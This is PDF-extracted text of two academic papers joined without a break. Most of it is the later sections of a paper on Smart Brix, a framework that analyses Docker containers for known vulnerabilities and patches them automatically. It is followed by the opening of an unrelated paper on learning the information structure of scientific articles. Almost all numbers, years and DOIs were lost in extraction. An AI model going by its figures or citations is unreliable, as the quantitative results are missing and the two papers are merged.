attributes. dependency manager the dependency manager handles necessary credentials and artifacts that are needed for processing containers. the dependency manager provides a service interface that allows the smart brix manager to store artifacts and credentials associated with specific containers. additionally, it provides a mechanism for components in the analyzer and compensation schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure smart brix manager sequence diagram. facets to retrieve the necessary credentials and artifacts for the corresponding container ids. finally, it acts as service registry for components in the utility facet and exposes them to the compensation and analyzer facet. the dependency manager uses a distributed key value store for its dependency repository in order to store the necessary information. utility facet the general role of the utility facet is to provide supporting services for analyzers, compensation handlers, and managers of the framework. components in the utility facet register their offered services via the dependency manager. this provides an open and extensible approach that allows to incorporate novel elements in order to address changing requirements of container evolution. in our current architecture, the utility facet contains three components. first, a vulnerability hub, which represents a service interface that allows analyzers as well as compensation handlers to check artifacts for vulnerabilities. the vulnerability hub can either utilize public repositories (e.g., the national vulnerability database: https://nvd.nist.gov/), or any other open or proprietary schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://nvd.nist.gov/ http://dx.doi.org/ . /peerj-cs. vulnerability repository. the second component is a compliance hub that allows to check for any compliance violations in the same way the vulnerability hub does. this is an important element in heterogenous multi-stakeholder environments, where compliance to all specified criteria must be ensured at all times. the last element is a metric hub, which allows to check artifacts for certain relevant metrics in order to ensure relevant quality of service constraints for containers. analyzers the task of the components within the analyzer facet is to test containers for potential vulnerabilities, compliance violations or any other metrics. the facet is invoked by the smart brix manager, which triggers an auto-assembly process for the given containers that should be analyzed. the analyzer facet can contain components for the most prominent container formats like docker or rkt, but due to the fact that we utilize the auto-assembly approach, we are able to integrate new container formats as they emerge. for analyzing a container an analyzer follows three basic steps: (i) determine the base layer of the container in order to know how to access the package list; (ii) determine the list of installed packages including their current version; (iii) match the list of installed packages against a set of vulnerabilities, issues, or compliance constraints in order to determine the set of problems. every step can follow a different set of strategies to analyze a container represented as different processors, each of them with a specific confidence value. possible processors for these steps are: (i) base image processors, which try to determine the base layer of a container by matching their history against known base image ids; (ii) similarity processors that try to select a base layer based on similarities in the history of the container with known containers by performing actions like collaborative filtering and text mining; (iii) convention processors that try to determine the base layer by trying common commands and checking their results; (iv) human provided processors, which are human experts that manually analyze a container. in order to access the containers and to perform analytics, the components within the analyzer facet interact with the dependency manager. the manager provides them with the necessary credentials for processing containers. once the analyzers have processed a container, they publish the results, which are augmented with the confidence value, to the corresponding topic where the smart brix manager carries on as previously described. compensation handlers the components in the compensation facet generate potential compensations for containers that have been previously identified by the analyzers. like the analyzers, the compensation handlers are invoked by the smart brix manager, which starts an auto-assembly process for the containers with problems that should be compensated. we provide components for the most prominent container formats, with the ability to extend the list as new formats emerge. the compensation handlers follow three basic steps: (i) apply a compensation strategy for the container and the identified problem; (ii) verify if the compensation strategy could be applied by rebuilding or restarting the container; (iii) verify that the problems could be eliminated or reduced. schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. again, every step can utilize a set of different processors, each of them with a specific confidence value, which represent different strategies. possible processors are: (i) container processors, which try to use the base image’s package manager to upgrade packages with identified vulnerabilities. (ii) image processors that try to build a new image without the vulnerabilities; (iii) similarity processor that try to compensate via applying steps from similar containers that do not show these vulnerabilities; (iv) human provided processors, which are human experts that manually compensate a container. the compensation handlers interact with the dependency manager in a similar way like the analyzers to retrieve the necessary credentials to operate. as image processors and similarity processors build new images in order to compensate, they can request the necessary artifacts associated with an image to be able build them. implementation we created a proof of concept prototype of our framework based on a set of restful microservices implemented in ruby. each component that exposes a service interface relies on the sinatra (http://www.sinatrarb.com/) web framework. the repository manager and the dependency manager utilize mongodb (https://www.mongodb.org/) as their storage backend, which enables the previously described distributed, open, and extendable key value store for their repositories. we implemented a vulnerability hub that uses a sqlite (https: //www.sqlite.org/) storage backend to persist vulnerabilities in a structured format. it holds the recent data from the national vulnerability database (nvd; https://nvd.nist.gov/), specifically the listed common vulnerabilities and exposures (cves). this cve hub allows to import the cves posted on nvd, stores them in its repository, and allows to search for cves by vulnerable software name as well as version via its sinatra-based rest interface. to enable the auto-assembly mechanism for each processor within each component in the analyzer and compensation facet, we use a message-oriented middleware. specifically, we utilize rabbitmq’s (https://www.rabbitmq.com/) topic and rpc concepts, by publishing each output and listening for its potential inputs on dedicated topics. we implemented a docker analyzer component with a base image processor and a convention processor-based strategy. the docker analyzer first tries to determine the operating system distribution of the container by analyzing its history. specifically, it uses the docker api to generate the history for the container and selects the first layer’s id, which represents the base layer. it then matches this layer against a set of known layer ids, which matches corresponding operating system distributions to determine which command to use for extracting the package list. if a match is found, it uses the corresponding commands to determine the package list. if the determined operating system is ubuntu or debian, it will use dpkg to determine the package list. if it was centos, yum is used, and if it was alpine, apk. after parsing the package command output into a processable list of packages, it checks each package name and version by using the cve hub via its rest interface. when this step is finished the analyzer publishes the list of possible vulnerabilities, including analyzed packages along with several runtime metrics. in case the base image strategy fails, the docker analyzer tries to determine the base layer including the corresponding operating system via a convention processor. specifically, it test if the image contains any of schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.sinatrarb.com/ https://www.mongodb.org/ https://www.sqlite.org/ https://www.sqlite.org/ https://nvd.nist.gov/ https://www.rabbitmq.com/ http://dx.doi.org/ . /peerj-cs. the known package managers. based on the results the analyzer determines the distribution flavor and continues as described above. we further implemented a docker compensation handler with a container processor and an image processor based compensation strategy. the container processor tries to upgrade the container using the operating system distribution’s package manager. after this operation succeeds, it checks if the number of vulnerabilities are reduced, by comparing the new version of packages against the cve hub. if this was the case it augments the results with a confidence value based on the percentage of fixed vulnerabilities and publishes the results. the image processor tries to fix the container by generating a new container manifest (e.g., dockerfile). more precisely, it uses the docker api to generate the image history and then derives a dockerfile from this history. after this step, the image processor exchanges the first layer of the dockerfile with the newest version of its base image. in cases where it cannot uniquely identify the correct linux flavor, it generates multiple dockerfiles, for example one for ubuntu and one for debian. it then checks the dockerfiles’ structure for potential external artifacts. specifically, it searches for any copy or add commands that are present in the dockerfile. if this is the case, it contacts the dependency manager and attempts to retrieve the missing artifacts. once this is finished the image processor tries to rebuild the image based on the generated dockerfile. after this step is finished, the image processor again checks the new list of packages against the cve hub, and if it could improve the state of the image it publishes the results with the corresponding confidence value. the prototype implementation is available online and can be found at https://bitbucket.org/jomis/smartbrix/. deployment modes the smart brix framework provides a container for each facet and therefore supports deployment on heterogeneous infrastructures. the framework enables wiring of components and aspects via setting the container’s environment variables, enabling dynamic setups. we distinguish between two fundamental deployment modes, inspection mode and introspection mode. inspection mode the inspection mode allows the framework to run in a dedicated inspection and com- pensation setting. in this mode the framework ideally runs exclusively without any other containers and utilizes the full potential of the host systems. this means that the smart brix managers wait until they receive an explicit request to analyze and compensate an artifact. introspection mode the introspection mode allows the framework to run in an active container setup. in this mode the framework constantly watches deployed containers via the smart brix manager. the manager can be provided with a list of containers to watch via a configuration setting. this provided list of containers is then analyzed and compensated. if no container lists are supplied, the manager watches all running containers on the platform. in this case it initiates a check whenever new images are added, an image of a running container changes, or new vulnerabilities are listed in the cve hub. schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://bitbucket.org/jomis/smartbrix/ http://dx.doi.org/ . /peerj-cs. figure evaluation setup of smart brix running in inspection mode. evaluation setup for our evaluation we used the following setup. we provisioned three instances in our private openstack cloud, each with . gb of ram and virtual cpus. each of these instances was running ubuntu . lts with docker staged via docker-machine (https: //docs.docker.com/machine/install-machine/). for our evaluation we choose the inspection deployment variant of our framework in order to stress-test the system without other inter- fering containers. we deployed one manager container representing the management facet, as well as two utility containers containing the cve hub and the messaging infrastructure on one instance. we then distributed analyzer containers with compensation containers over the remaining two instances. additionally, we deployed a cadvisor (https: //github.com/google/cadvisor) container on every instance to monitor the resource usage and performance characteristics of the running containers. figure shows an overview of the deployed evaluation setup. experiments since we currently only have around images in our urbem setting, we extended the number of images to be evaluated. in order to get a representative set of heterogenous images we implemented a small service to crawl docker hub (https://hub.docker.com/). the docker hub is a public repository of docker container images of different flavors. these images range from base images, like ubuntu and centos etc., to more complex images like cassandra and apache spark. we utilized the search function of the hub to collect a set of , images ordered by their popularity (number of pulls and number of schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://docs.docker.com/machine/install-machine/ https://docs.docker.com/machine/install-machine/ https://github.com/google/cadvisor https://github.com/google/cadvisor https://hub.docker.com/ http://dx.doi.org/ . /peerj-cs. stars), which ensures that we focus on a set with a certain impact. we then extracted the name and the corresponding pull commands along with the latest tag to form the uri of the image. this set of , uris represented the source for our experiments, which was then split into sets containing , , and , images to be tested. analyzer experiments we started our experiments with a focus on the analyzer facet of the framework. first, we started the analyzer containers on one instance and started our tests with the image set. after the run finished we repeated it with the and , image set. after the tests with one instance, we repeated the experiments with two instances where each run was repeated three times. during the tests we constantly monitored cadvisor to ensure that the instances were not fully utilized in order to ensure this would not skew results. the focus of our experiments were not the performance characteristics of our framework, in terms of cpu, memory or disk usage, which is why we used cadvisor only as a monitor to rule out overloading our infrastructure. we also did not utilize any storage backend for cadvisor since this has shown to be a significant overhead which in turn would have skewed our results. after the runs had finished we evaluated the vulnerability results. the analyzers logged the analyzed images, their base image flavor (e.g., ubuntu, debian etc.), processing time to analyze the image, pull time to get the image from the dockerhub as well as the overall runtime, number of packages, size of the image, and number of vulnerabilities. over all our experiments the analyzers showed that around % of the analyzed images have vulnerabilities. this mainly stems from the fact that our implemented analyzers have a very high sensitivity and check for any potentially vulnerable software with any potentially vulnerable configuration. however, this does not necessarily mean that the specific combination of software and configuration in place shows the detected vulnerability. if we only take a look at the images with a high severity according to their cvss (https://nvd.nist.gov/cvss.cfm) score, around % show to be affected which is conclusive with recent findings (http://www.banyanops.com/blog/analyzing-docker-hub/). these results underline the importance to implement the measures proposed by our framework. however, the focus of our work and the aim of our experiments was not to demonstrate the accuracy of the implemented vulnerability detection, but the overall characteristics of our framework, which we discuss in the remainder of this section. we first compared the overall runtime of our analyzers, specifically the difference for one instance vs two instance deployments, the results are shown in fig. . based on the results we see that our approach can be horizontally scaled over two nodes leading to a performance improvement of around %. the fact that in our current evaluation setting we were not able to halve the overall runtime using two instances stems from several factors. on the one hand, we have a certain overhead in terms of management and coordination including the fact that we only deployed one manager and storage asset. on the other hand, a lot of the runtime is caused by the acquisition time, which is clearly bound by network and bandwidth. since our infrastructure is equipped with just one mbit uplink that is shared by all cloud resources, this is a clear bottleneck. we also see that the majority of wall clock time is spent for acquisition and that the actual processing time only amounts to schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://nvd.nist.gov/cvss.cfm http://www.banyanops.com/blog/analyzing-docker-hub/ http://dx.doi.org/ . /peerj-cs. figure comparison of runtime for analytics between one instance and two instances. table median and standard deviation for processing time per package over all runs with two in- stances. set median processing time standard deviation processing time no. of packages . s . s , . s . s , , . s . s , overall . s . s , , approximately % of the overall runtime. the fact that the acquisition time for the , image set does not grow linearly like the runs with the and image set, stems from docker’s image layer cache. in this case the overall acquisition time grows slower, because a lot of images in the , set share several layers, which, if already pulled by another analyzer in a previous run, do not need to be pulled again, hence reducing the acquisition time. finally, we demonstrate that the average processing time of our framework is stable, which is shown in fig. . we further notice a small increase in average processing time for the image set, which is caused by the fact that this set contains more images with larger package numbers compared to the overall amount of images tested, resulting in a slightly higher average processing time. as illustrated in table , per-package processing times remain stable throughout the performed experiments, with a median of . s and a standard deviation of . s. compensation experiments in the the next part of our experiments we focused on the compensation facet of our framework. in order to test the ability to automatically handle compensations of vulnerable images, we tested the implemented container processor strategy. this strategy compensates found vulnerabilities via automatic upgrades of existing images. it takes schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison of processing time for analytics with two instances. no human intervention, has a very high confidence, keeps all artifacts within the images and is therefore optimal to test the auto-compensation ability of our framework. in the process of compensation the container processor generates a new image with the upgraded packages. in order to test this image for improvement we have to store it. this means that for every tested image we have to hold the original image as well as its compensated version. specifically, we choose to test the most vulnerable images (images with the most vulnerable packages) out of the , image set we tested that are also the most prominent images in our urbem scenario. this left us with images, which we split in three sets with , , and images and started our compensation tests. we then repeated each run to demonstrate repeatability and to balance our results. since the compensation facet follows the same principle as the analyzer facet we omitted testing it on one instance and immediately started with two instances. after the tests finished, we compared the newly created images to the original ones and checked if the number of vulnerabilities could be reduced. overall our experiments showed that from the images we were able to auto- compensate images by reducing the number of vulnerabilities. this illustrates that even a rather simple strategy leads to a significant improvement of around . %, which makes this a very promising approach. in a next step, we compared the overall runtime of our compensation handlers for the three tested sets, and the results are shown in fig. . we again can clearly see that the major amount of time is spent for acquisition, in this case pulling the images that need to be compensated. the compensation itself only takes between % and % of the overall runtime and shows linear characteristics correlating with the number of images to be compensated. the comparatively low increase in acquisition time for the image set again can be explained with the specific characteristics we see in docker’s layer handling. in a next step, we compared the average processing time for each set, and the results are shown in fig. . we again notice similar characteristics as we saw with our analyzers. schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison of pulltime and processing time for compensation with two instances. figure comparison of processing time for compensation with two instances. the average processing time as well as the median processing time are stable. the small increase for the image set is explained with a larger number of images that contain more packages. this fact leads to relatively longer compensation times when upgrading them. discussion our experiments showed that our framework is able to scale horizontally. we further demonstrated that the majority of the runtime, both when analyzing and compensating images is caused by the image acquisition, which is bandwidth bound. given the fact that in most application scenarios of our framework the images will not necessarily reside on schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. docker hub, but instead in a local registry, this factor greatly relativizes. the processing time itself scales linearly with the number of analyzed packages, and the same was shown for the compensation approach. furthermore, the processing time in our current evaluation setup is mostly constrained by the prototypical vulnerability checking mechanism and the chosen storage system, which both are not the focus of our contribution. the implementation of different vulnerability checkers, along with more efficient storage and caching of vulnerability data could lead to further reduction in processing time and will be tackled in future work. an additional aspect we did not specifically address in this paper is the fine-grained scale-out of components in all smart brix facets. threats to applicability while the presented framework fulfills the requirements set forth in the previously introduced urbemproject, certain threatsto the generalapplicability of smartbrix remain. currently, the auto-assembly mechanism introduced in ‘framework rationales’ attempts to eagerly construct analysis and compensation pipelines that are loosely structured along the level of specificity of the performed analysis. hence, the number of created pipelines can grow exponentially with the number of candidate components in the worst case. if all components for a given level of specificity accept all inputs produced in the previous level, and all subsequent components accept all produced outputs in turn, the number of created pipelines would grow exponentially with the number of components per level of specificity. this problem can be mitigated by introducing a transparent consolidation mechanism that delays the propagation of produced outputs of a certain type for a specified amount of time, orders them by the reported confidence values, and only submits one (or a few) of the produced output values with the highest confidence values for further consumption by other components. due to the relatively small number of processing components required for the urbem use case, we left the implementation of this consolidation mechanism for future work. related work the rapid adoption of container-based execution environments for modern applications enables increased flexibility and fast-paced evolution. next to this fast-paced evolution of containers, new containers are deployed whenever functionality has to be added, which leads to massive amounts of containers that need to be maintained. while the container provides an abstraction on top of the operating system, it is still vital that the underlying system complies to policies or regulations to avoid vulnerabilities. however, checking the plethora of available environments and adapting them accordingly, is not a trivial task. among several approaches stemming from the area of soa like the works of lowis & accorsi ( ), yu, aravind & supthaweesuk ( ) which deal with classic service vulnerabilities as well as the work of li et al. ( ), lowis & accorsi ( ) propose a novel method for analyzing cloud-based services for certain types of vulnerabilities. next to general models and methods for classifying and analyzing applications, several approaches emerged that allow vulnerability testing. they range from service oriented approaches for penetration and automated black box testing introduced by bau et al. ( ) and li schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. et al. ( ) to model based vulnerability testing like the work of lebeau et al. ( ) as well as automated vulnerability and infrastructure testing methods (e.g., shahriar & zulkernine, ; hummer et al., ). antunes & vieira ( ) introduce soa-scanner, an extensible tool for testing service-based environments for vulnerabilities. based on an iterative approach the tool discovers and monitors existing resources, and automatically applies specific testing approaches. also, more recently, large scale distributed vulnerability testing approaches have been introduced (e.g., evans, benameur & elder, ; zhang et al., ). in contrast to our approach, the aforementioned tools solely concentrate on testing and identifying possible security threats, but do not provide means for adapting the observed application or its environment accordingly. more recently, container-based approaches are applied in the literature to ease development and operation of applications. tosatto, ruiu & attanasio ( ) analyze different cloud orchestration approaches based on containers, discuss ongoing research efforts as well as existing solutions. furthermore, the authors present a broad variety of challenges and issues that emerge in this context. wettinger, breitenbücher & leymann ( ) present an approach that facilitates container virtualization in order to provide an alternative deployment automation mechanism to convergent approaches that are based on idempotent scripts. by applying action-level compensations, implemented as fine-grained snapshots in the form of containers, the authors showed that this approach is more efficient, more robust, and easier to implement as convergent approaches. however, compared to our approach, the authors do not provide a framework for analyzing container application deployments, which based on identified issues triggers according compensation mechanisms. gerlach et al. ( ) introduce skyport, a container-based execution environment for multi-cloud scientific workflows. by employing docker containers, skyport is able to address software deployment challenges and deficiencies in resource utilization, which are inherent to existing platforms for executing scientific workflows. in order to show the feasibility of their approach, the authors add skyport as an extension to an existing platform, and were able to reduce the complexities that arise when providing a suitable execution environment for scientific workflows. in contrast to our approach the authors solely focus on introducing a flexible execution environment, but do not provide a mechanism for continuously evolving container-based deployments. li, kanso & gherbi ( ) present an approach that leverages linux containers for achieving high availability of cloud applications. the authors present a middleware that is comprised of agents to enable high availability of linux containers. in addition, application components are encapsulated inside containers, which makes the deployment of components transparent to the application. this allows monitoring and adapting components deployed in containers without modifying the application itself. although this work shares similarities with our approach, the authors do not provide a framework for testing container-based deployments, which also supports semi-automatic compensation of found issues. next to scientific approaches, also several industrial platforms emerged that deal with the development and management of container-based applications, with the most prominent being tutum (https://www.tutum.co) and tectonic (https://tectonic.com). these cloud-based platforms allow building, deploying and managing dockerized schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.tutum.co https://tectonic.com http://dx.doi.org/ . /peerj-cs. applications. they are specifically built to make it easy for users to develop and operate the full spectrum of applications, reaching from single container apps, up to distributed microservices stacks. furthermore, these platforms allow keeping applications secure and up to date, by providing easy patching mechanisms and holistic systems views. in contrast to our approach, these platforms only focus on one specific container technology, and are not extensible. ibm recently introduced the ibm vulnerability advisor (https: //developer.ibm.com/bluemix/ / / /vulnerability-advisor/), a tool for discovering possible vulnerabilities and compliance policy problems in ibm containers. while ibm’s approach shares similarities with our work, they are solely focusing on docker containers that are hosted inside their own bluemix environment and therefore do not provide a generic approach. furthermore, their vulnerability advisor only provides guidance on how to improve the security of images, but does not support mechanisms to evolve containers. conclusion the numerous benefits of container-based solutions have led to a rapid adoption of this paradigm in recent years. the ability to package application components into self- contained artifacts has brought substantial flexibility to developers and operation teams alike. however, to enable this flexibility, practitioners need to respect numerous dynamic security and compliance constraints, as well as manage the rapidly growing number of container images. in order to stay on top of this complexity it is essential to provide means to evolve these containers accordingly. in this paper we presented smart brix, a framework enabling continuous evolution of container application deployments. we described the urbem scenario as a case study in the smart city context and provided a comprehensive description of its requirements in terms of container evolution. we introduced smart brix to address these requirements, described its architecture, and the proof of concept implementation. smart brix supports both, traditional continuous integration processes such as integration tests, as well as custom, business-relevant processes, e.g., to implement security, compliance, or other regulatory checks. furthermore, smart brix not only enables the initial management of application container deployments, but is also designed to continuously monitor the complete application deployment topology and allows for timely reaction to changes (e.g., discovered application vulnerabilities). this is achieved using analytics and compensation pipelines that will autonomously detect and mitigate problems if possible, but are also designed with an escalation mechanism that will eventually request human intervention if automated implementation of a change is not possible. we evaluated our framework using a representative case study that clearly showed that the framework is feasible and that we could provide an effective and efficient approach for container evolution. as part of our ongoing and future work, we will extend the presented framework to incorporate more sophisticated checking and compensation mechanisms. we will integrate mechanisms from machine learning, specifically focusing on unsupervised learning techniques as a potential vector to advance the framework with autonomous capabilities. we also aim to integrate the smart brix framework with our work on iot cloud applications (inzinger et al., ; vögler et al., b; vögler et al., a). furthermore, we schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://developer.ibm.com/bluemix/ / / /vulnerability-advisor/ https://developer.ibm.com/bluemix/ / / /vulnerability-advisor/ http://dx.doi.org/ . /peerj-cs. plan to conduct a large-scale feasibility study of our framework in heterogenous container application deployments. additional information and declarations funding the research leading to these results has received funding from the urbem doctoral college. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: urbem. competing interests schahram dustdar is an academic editor for peerj. author contributions • johannes m. schleicher conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • michael vögler and christian inzinger conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • schahram dustdar wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: ( ) source code repository for the prototype implementation: https://bitbucket.org/ jomis/smartbrix/ ( ) the evaluation results: https://bitbucket.org/jomis/smartbrix/downloads/smartbrix_ evaluation_results.zip. references antunes n, vieira m. . soa-scanner: an integrated tool to detect vulnerabilities in service-based infrastructures. in: proceedings of the international conference on services computing. piscataway: ieee, – . bau j, bursztein e, gupta d, mitchell j. . state of the art: automated black-box web application vulnerability testing. in: proceedings of the symposium on security and privacy. piscataway: ieee, – . evans ns, benameur a, elder m. . large-scale evaluation of a vulnerability analysis framework. in: th workshop on cyber security experimentation and test (cset ). available at http://nsl.cs.columbia.edu/projects/minestrone/papers/cset -paper- evans.pdf . schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://bitbucket.org/jomis/smartbrix/ https://bitbucket.org/jomis/smartbrix/ https://bitbucket.org/jomis/smartbrix/downloads/smartbrix_evaluation_results.zip https://bitbucket.org/jomis/smartbrix/downloads/smartbrix_evaluation_results.zip http://dx.doi.org/ . /peerj-cs. gamma e, helm r, johnson r, vlissides j. . design patterns: elements of reusable object-oriented software. boston: addison-wesley professional. gerlach w, tang w, keegan k, harrison t, wilke a, bischof j, dsouza m, devoid s, murphy-olson d, desai n, meyer f. . skyport—container-based execution environment management for multi-cloud scientific workflows. in: proceedings of the international workshop on data-intensive computing in the clouds. piscataway: ieee, – . humble j, farley d. . continuous delivery: reliable software releases through build, test, and deployment automation. st edition. boston: addison-wesley professional. hummer w, rosenberg f, oliveira f, eilam t. . testing idempotence for infrastructure as code. lecture notes in computer science, vol. . berlin heidelberg: springer, – . hüttermann m. . devops for developers. new york: apress. inzinger c, nastic s, sehic s, vögler m, li f, dustdar s. . madcat—a methodol- ogy for architecture and deployment of cloud application topologies. in: proc. intl. symp. on service-oriented system engineering. piscataway: ieee, – . lebeau f, legeard b, peureux f, vernotte a. . model-based vulnerability testing for web applications. in: proceedings of the international conference on software testing, verification and validation workshops. piscataway: ieee, – . li r, abendroth d, lin x, guo y, baek h-w, eide e, ricci r, van der merwe j. . potassium: penetration testing as a service. in: proceedings of the symposium on cloud computing. new york: acm, – . li w, kanso a, gherbi a. . leveraging linux containers to achieve high availability for cloud services. in: proceedings of the international conference on cloud engineering. piscataway: ieee, – . li h-c, liang p-h, yang j-m, chen s-j. . analysis on cloud-based security vul- nerability assessment. in: proceedings of the international conference on e-business engineering. piscataway: ieee, – . lowis l, accorsi r. . on a classification approach for soa vulnerabilities. in: proceedings of the international computer software and applications conference. piscataway: ieee, – . lowis l, accorsi r. . vulnerability analysis in soa-based business processes. ieee transactions on services computing ( ): – doi . /tsc. . . nelson-smith s. . test-driven infrastructure with chef . nd edition. north se- bastopol: o’reilly media. newman s. . building microservices. north sebastopol: o’reilly media, inc. schleicher jm, vögler m, inzinger c, dustdar s. a. smart fabric-an infrastructure- agnostic artifact topology deployment framework. in: proceedings of the international conference on mobile services. piscataway: ieee, – . schleicher jm, vögler m, inzinger c, dustdar s. b. towards the internet of cities: a research roadmap for next-generation smart cities. in: proceedings of the international workshop on understanding the city with urban informatics. new york: acm, – . schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tsc. . http://dx.doi.org/ . /peerj-cs. schleicher jm, vögler m, inzinger c, hummer w, dustdar s. c. nomads— enabling distributed analytical service environments for the smart city domain. in: proceedings of the international conference on web services. piscataway: ieee, – . shahriar h, zulkernine m. . automatic testing of program security vulnerabilities. in: proceedings of the international computer software and applications conference, vol. . piscataway: ieee, – . soltesz s, pötzl h, fiuczynski me, bavier a, peterson l. . container-based oper- ating system virtualization: a scalable, high-performance alternative to hypervisors. sigops operating systems review ( ): – doi . / . . tosatto a, ruiu p, attanasio a. . container-based orchestration in cloud: state of the art and challenges. in: proceedings of the international conference on complex, intelligent, and software intensive systems. piscataway: ieee, – . vögler m, schleicher jm, inzinger c, dustdar s. a. diane—dynamic iot application deployment. in: proceedings of the international conference on mobile services. piscataway: ieee, – . vögler m, schleicher jm, inzinger c, nastic s, sehic s, dustdar s. b. leonore— large-scale provisioning of resource-constrained iot deployments. in: proceedings of the international symposium on service-oriented system engineering. piscataway: ieee, – . wettinger j, breitenbücher u, leymann f. . compensation-based vs. convergent deployment automation for services operated in the cloud. lecture notes in computer science : – doi . / - - - - _ . yu w, aravind d, supthaweesuk p. . software vulnerability analysis for web services software systems. in: proceedings of the symposium on computers and communications. piscataway: ieee, – . zhang d, liu d, csallner c, kung d, lei y. . a distributed framework for demand-driven software vulnerability detection. journal of systems and software : – doi . /j.jss. . . . schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /peerj-cs. unsupervised declarative knowledge induction for constraint-based learning of information structure in scientific documents yufan guo dtal university of cambridge, uk yg @cam.ac.uk roi reichart technion - iit haifa, israel roiri@ie.technion.ac.il anna korhonen dtal university of cambridge, uk alk @cam.ac.uk abstract inferring the information structure of scien- tific documents is useful for many nlp appli- cations. existing approaches to this task re- quire substantial human effort. we propose a framework for constraint learning that re- duces human involvement considerably. our model uses topic models to identify latent top- ics and their key linguistic features in input documents, induces constraints from this in- formation and maps sentences to their domi- nant information structure categories through a constrained unsupervised model. when the induced constraints are combined with a fully unsupervised model, the resulting model challenges existing lightly supervised feature- based models as well as unsupervised mod- els that use manually constructed declarative knowledge. our results demonstrate that use- ful declarative knowledge can be learned from data with very limited human involvement. introduction automatic analysis of scientific text can help scien- tists find information from literature faster, saving valuable research time. in this paper we focus on the analysis of the information structure (is) of sci- entific articles where the aim is to assign each unit of an article (typically a sentence) into a category that represents the information type it conveys. by infor- mation structure we refer to a particular type of dis- course structure that focuses on the functional role of a unit in the discourse (webber et al., ). for instance, in the scientific literature, the functional role of a sentence could be the background or moti- vation of the research, the methods used, the experi- ments carried out, the observations on the results, or the author’s conclusions. readers of scientific literature find information in is-annotated articles much faster than in unanno- tated articles (guo et al., b). argumentative zoning (az) – an information structure scheme that has been applied successfully to many scientific do- mains (teufel et al., ) – has improved tasks such as summarization and information extraction and retrieval (teufel and moens, ; tbahriti et al., ; ruch et al., ; liakata et al., ; contractor et al., ). existing approaches to information structure anal- ysis require substantial human effort. most use feature-based machine learning, such as svms and crfs (e.g. (teufel and moens, ; lin et al., ; hirohata et al., ; shatkay et al., ; guo et al., ; liakata et al., )) which rely on thousands of manually annotated training sen- tences. also the performance of such methods is rather limited: liakata et al. ( ) reported per- class f-scores ranging from . to . in the bio- chemistry and chemistry domains and guo et al. ( a) reported substantially lower numbers for the challenging introduction and discussion sections in biomedical domain. guo et al. ( a) recently applied the general- ized expectation (ge) criterion (mann and mccal- lum, ) to information structure analysis using expert knowledge in the form of discourse and lexi- cal constraints. their model produces promising re- sults, especially for sections and categories where transactions of the association for computational linguistics, vol. , pp. – , . action editor: masaaki nagata. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. feature-based models perform poorly. even the unsupervised version which uses constraints under a maximum-entropy criterion without any feature- based model, outperforms fully-supervised feature- based models in detecting challenging low fre- quency categories across sections. however, this ap- proach still requires substantial human effort in con- straint generation. particularly, lexical constraints were constructed by creating a detailed word list for each information structure category. for example, words such as “assay” were carefully selected and used as a strong indicator of the “method” category: p(method|assay) was constrained to be high (above . ). such a constraint (developed for the biomedi- cal domain) may not be applicable to a new domain (e.g. computer science) with a different vocabulary and writing style. in fact, most existing works on learning with declarative knowledge rely on manually constructed constraints. little work exists on automatic declar- ative knowledge induction. a notable exception is (mcclosky and manning, ) that proposed a constraint learning model for timeline extraction. this approach, however, requires human supervi- sion in several forms including task specific con- straint templates (see section ). we present a novel framework for learning declar- ative knowledge which requires very limited human involvement. we apply it to information structure analysis, based on two key observations: ) each information structure category defines a distribution over a section-specific and an article-level set of lin- guistic features. ) each sentence in a scientific doc- ument, while having a dominant category, may con- sist of features mostly related to other categories. this flexible view enables us to make use of topic models which have not proved useful in previous re- lated works (varga et al., ; reichart and korho- nen, ). we construct topic models at both the individual section and article level and apply these models to data, identifying latent topics and their key linguis- tic features. this information is used to constrain or bias unsupervised models for the task in a straight- forward way: we automatically generate constraints for a ge model and a bias term for a graph clus- tering objective, such that the resulting models as- sign each of the input sentences to one information zone definition background (bkg) the background of the study problem (prob) the research problem method (meth) the methods used result (res) the results achieved conclusion (con) the authors’ conclusions connection (cn) work consistent with the current work difference (diff) work inconsistent with the current work future work (fut) the potential future direction of the research table : the az categorization scheme of this paper structure category. both models provide high qual- ity sentence-based classification, demonstrating the generality of our approach. we experiment with the az scheme for the anal- ysis of the logical structure, scientific argumenta- tion and intellectual attribution of scientific papers (teufel and moens, ), using an eight-category version of this scheme for biomedicine ((mizuta et al., ; guo et al., b), table ). in evalu- ation against gold standard annotations, our model rivals the model of guo et al. ( a) which relies on manually constructed constraints, as well as a strong supervised feature-based model trained with up to sentences. in task-based evaluation we measure the usefulness of the induced categories for customized summarization (contractor et al., ) from specific types of information in an article. 